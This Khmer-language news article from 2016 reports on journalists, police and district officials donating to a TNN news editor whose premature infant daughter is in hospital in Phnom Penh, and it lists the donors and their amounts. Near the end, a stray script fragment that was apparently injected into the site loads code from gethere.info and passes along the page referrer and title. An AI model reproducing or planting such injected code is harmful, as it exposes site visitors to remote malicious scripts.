លោកអេង​ វុត្ថា​ និងលោកម៉ៅ​ ចាន់ថុន​ នាំយកថវិកា​ និងបញ្ជីរាយនាមសប្បុរសជន ប្រគល់ជូន​អ្នកសារ​ព័ត៌មានម្នាក់មានកូនតូចឈឺសម្រាកក្នុងមន្ទីរពេទ្យកុមារជាតិ

 

ភ្នំពេញ៖ ប្រធានក្រុមភ្នាក់ងារព័ត៌មានទូរទស្សន៍MSJ លោកអេង វុត្ថា និងកញ្ញា ជួប ស្រីដា ភ្នាក់ងារព័ត៌មានMSJ ប្រចាំរាជធានី តំណាង អ្នកសារព័ត៌មាន និងសប្បុរសជននានា កាលពីវេលាម៉ោង៤ល្ងាច  ថ្ងៃទី១៦ ខែមិថុនា ឆ្នាំ២០១៦នេះបានអញ្ជើញចុះសំណេះសំណាលសួរសុខទុក្ខលើកទឹកចិត្ត ព្រមទាំងនាំយកថវិការសប្បុរសធម៌ ឧបត្ថម្ភដល់លោក សំបុល វិជ្ជា និពន្ធនាយកព័ត៌មានTNN ខណ:ដែលរូបលោកមានកូនតូចកើតមិនគ្រប់ខែ ទទួលរងការឈឺថ្កាត់ស្ទើររាល់អាទិត្យ បច្ចុប្បន្នដែលកូនរបស់លោកកំពុងសម្រាកព្យាបាលក្នុងអាគារB នៃមន្ទីរពេទ្យកុមារជាតិ ស្ថិតក្នុងសង្កាត់ ទឹកល្អក់១ ខណ្ឌទួលគោក រាជធានីភ្នំពេញ។

 

ជាមួយគ្នានេះដែរនាយរងផ្នែកព្រហ្មទណ្ឌខណ្ឌឬស្សីកែវ លោកម៉ៅ ចាន់ថុន តំណាងអធិការដ្ឋានខណ្ឌឬស្សីកែវ មានលោកទៀង ច័ន្ទសារជាប្រធានអង្គភាព និងតំណាងលោកជា ពិសី អភិបាលខណ្ឌឬស្សីកែវ រួមនិងប្រធានសមាគមន៍នារីខណ្ឌលោកស្រី អាន ផល្លា ភរិយាលោកជា ពិសី ដោយក្នុងនោះនាយរងផ្នែកបាននាំយកថវិកាសប្បុរសធម៌ប្រគល់ជូន ប្អូនវិជ្ជា និងក្រុមគ្រួសារដើម្បីជួយសម្រួលថ្លៃព្យាបាល ខណ:ដែលប្អូនមានកូនសម្រាកព្យាបាលក្នុងមន្ទីរពេទ្យ។

នាវេលានោះដែរនាយរងផ្នែកព្រហ្មទណ្ឌខណ្ឌឬស្សីកែវ បានពាំនាំប្រសាសន៍ផ្តាំផ្ញើនៃការសួរសុខទុក្ខរបស់អធិការខណ្ឌ ក៏ដូចជាអភិបាលខណ្ឌ និងលោកស្រីប្រធាននារីខណ្ឌ ជូនទៅក្រុមគ្រួសារត្រូវខិតខំព្យាបាលតាមការណែរនាំរបស់ក្រុមគ្រូពេទ្យ ព្រមទាំងសូមអោយក្រុមគ្រួសារកាត់បន្ថយការព្រួយបារម្ភ ដើម្បីសុខភាពខ្លួនផ្ទាល់កុំអោយមានការឈឺថ្កាត់បន្ថែមលើនេះទៀត ដើម្បីបន្តជួយថែរទាំកូនតូច។

 

ស្ថិតក្នុងតំណាងគ្រួសារ និពន្ធនាយកព័ត៌មានTNN លោក សំបុល វិជ្ជា សូមគោរពអរគុណយ៉ាងជ្រាលជ្រៅដល់បងប្អូនសារព័ត៌មាននិងសប្បុរសជនទាំងអស់ ក៏ដូចជាលោក អេង វុត្ថា ប្រធានក្រុមព័ត៌មានទូរទស្សន៍MSJ និងកញ្ញាស្រីដា ព្រមទាំងនាយរងផ្នែកព្រហ្មទណ្ឌលោក ម៉ៅ ចាន់ថុន ដែលបាន ចំណាយពេលវេលាដ៏មានតំលៃអញ្ជើញមកផ្តល់កម្លាំងចិត្ត ខណ:មានកូនតូចឈឺក្នុងមន្ទីរពេទ្យ ព្រមទាំងបានជួយសំរួលថ្លៃថ្នាំព្យាបាលដល់ក្រុមគ្រួសាររូបលោក គ្រាដែលមានកូនតូចកើតមិនគ្រប់ខែ ភ្ជាប់មកជម្ងឺហូរហែរឈឺមិនចេះដាច់រហូតមកនេះ។ ជាចុងក្រោយ នឹងសូមបួងសួងដល់វត្ថុស័កសិទ្ធិក្នុងលោកសូមប្រសិទ្ធិពរជ័យជូនដល់បងប្អូនទាំងអស់ទទួល ជួបបាននូវតែសេចក្តីសុខគ្រប់ៗគ្នា។

សូមបញ្ជាក់ថាកុមារីដែលស្ថិតក្នុងការព្យាលពីសំណាក់ក្រុមគ្រូពេទ្យនេះ មានឈ្មោះសំបុល អេលីស អាយុ៧ខែជាកុមារដែលតែងតែរត់រកមន្ទីរពេទ្យស្ទើររាល់អាទិត្យ និងបច្ចុប្បន្នទើបមានទម្ងន់បានតែ៤គីឡូប៉ុណ្ណោះ ព្រោះជាប់ជម្ងឺហូរហែរ ខណ:ដែលកើតមិនគ្រប់ខែត្រឹមបាន៧ខែស្ថិតក្នុងការវះកាត់ជួយសង្គ្រោះពីក្រុមគ្រូពេទ្យ។

ខាងក្រោមនេះជានាមសប្បុរសជននាៗ នឹងមានជាបន្តបន្ទាប់ទៀតដែលមានសមាណចិត្តប្រកបដោយក្តីសប្បុរសធម៌ បានឧបត្ថម្ភជួយសំរួលដល់ក្រុមគ្រួសារលោក វិជ្ជា ដែលស្ថិតក្នុងស្ថានភាពតានតឹង ខណ:ដែលមានកូនតូចកើតមិនគ្រប់ខែភ្ជាប់មកជម្ងឺហូរហែរ ឈឺមិនចេះដាច់រហូតមក។

 

ឈ្មោះសប្បុរសជននឹងឡើងជូនជាបន្តបន្ទាប់ ប្រសិនបើបងប្អូនចង់ឧបត្ថម្ភដល់រូបគាត់ សូមធ្វើការទំនាក់ទំនងតាមលេខ 097 640 5454(✅បានទទួលថវិការួច)
????????????

1  លោក អេង វុត្ថា MSJTV 10$✅
2  កញ្ញា  ជួប ស្រីដា MSJTV 20000រៀល✅
3   លោកស្រី  អាន ផល្លា ប្រធានសមាគមន៍នារីខណ្ឌឬស្សីកែវ 50$✅
4.  លោក  ទៀង ច័ន្ទសារ អធិការខណ្ឌឬស្សីកែវ 20 ម៉ឺនរៀល✅
5.  លោក ម៉ៅចាន់ថុននាយរងផ្នែកព្រហ្មទណ្ឌ
ខណ្ឌឬស្សីកែវ 10 ម៉ឺនរៀល✅
6   លោក  ម៉ៃ គុណមករា កាសែតខ្មែរថាមស៍10$
7.  លោក  អោម សុភ័ណ្ណ TV9 10$✅
8.  លោក លឹម សេរីសោភ័ណ្ឌ  អធិការរងខណ្ឌឬស្សីកែវ 10 មឺុនរៀល✅
9. លោក ខេង ប៊ុនធឿន TV3   10$✅
10. លោក  តាំង ចាន់តូ TV9   10$✅
11. លោក តូ សុផល TNN    10$✅
12. លោក ប៊ុនធីម និពន្ធនាយក phnom  penh press 10$✅
13. លោក សាវរក្ស រស្មីកម្ពុជា 10$✅
14 . លោក  អ៊ុក ដារារាជ្យ ចាងហ្វាងព័ត៍មាន ឧត្តមព័ត៌មានខ្មែរ10$✅
15   លោក  ប៉ាង លីដា អភិបាលរងខណ្ឌទួលគោក 120,000រៀល✅
16   លោក  តុង សីហា TV3 និង កាសែតនគរវត្ត 10$✅
17. លោក  រាជសារ៉ាត់TV 3នឹងPOSE NEWS 10$
18. លោក  កែវ ឈីម TV ហង្សមាស 10$
19. លោក ណយ ច័ន្ទណារ័ត្ន មន្ត្រីព្រហ្មទណ្ឌខណ្ឌឬស្សីកេវ 10$✅
20.  លោក មុំ វណ្ណា (ហៅបងរ៉ាម៉ន) រស្មីកម្ពុជាសាលាក្រុង 5ម៉ឺនរៀល✅
21.  លោក ប្រាក់ តារាវុទ្ធី អ្នកយកព័ត៌មាន BTV  10$✅
22. លោក ស៊ុន តិច TV CNC ២០០០០រៀល
23. លោក តូច គឹមសុង នាយបុស្ដ៍ឬស្សីកែវ 10ម៉ឺនរៀល✅
24. លោក មាស សុផានិត កូនប្រុសលោកមាស សុផា
អធិការរងខណ្ឌឫស្សីកែវ 10$.
25. លោក ស្រេង ដារ៉ា អគ្គនាយកព័ត៌មាន Post News 10$✅
26. ឯកឧត្តម សាយ សំអាល់ រដ្ឋមន្ត្រីក្រសួងបរិស្ថាន 200$✅
27. លោក ជា ពិសី អភិបាលខណ្ឌឬស្សីកែវ 30 ម៉ឹនរៀល✅
28. លោក ហឹម គឹមសាន នាយបុស្ដ៍ស្វាយប៉ាក 15$✅
29. លោក ថនប៊ុនថា នាយបុស្ត៍គីឡូម៉ែត្រលេខ6 30$✅
30. លោក សាម TV3  20000 រៀល
31. លោក រឿន វន នាយបុស្ដ៍ច្រាំងចំរេះទី1 10ម៉ឺនរៀល✅
32. លោក ហាស់ កំសាន្ដ Fresh News និងអប្សារា១១ ៥ម៉ឺនរៀល✅
33. លោក ហែម វណ្ណា នាយផ្នែកស្ថិតិខណ្ឌឬស្សីកែវ 20$
34. លោក មាស សុផា អធិការរងខណ្ឌឬស្សីកែវ 10
35.លោក កែម ថាវង្ស មន្រីព្រហ្មទណ្ឌខណ្ឌឬស្សីកែវ10$
36. នាយឧត្តមសេនីយ៍ រ័ត្ន ស្រ៊ាង មេបញ្ជាការអាវុធហត្ថរាជធានីភ្នំពេញ 100$✅

IMG-20160616-WA0177 IMG-20160616-WA0173IMG-20160616-WA0175Screenshot_2016-06-16-14-11-29-1received_1792457614320237s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More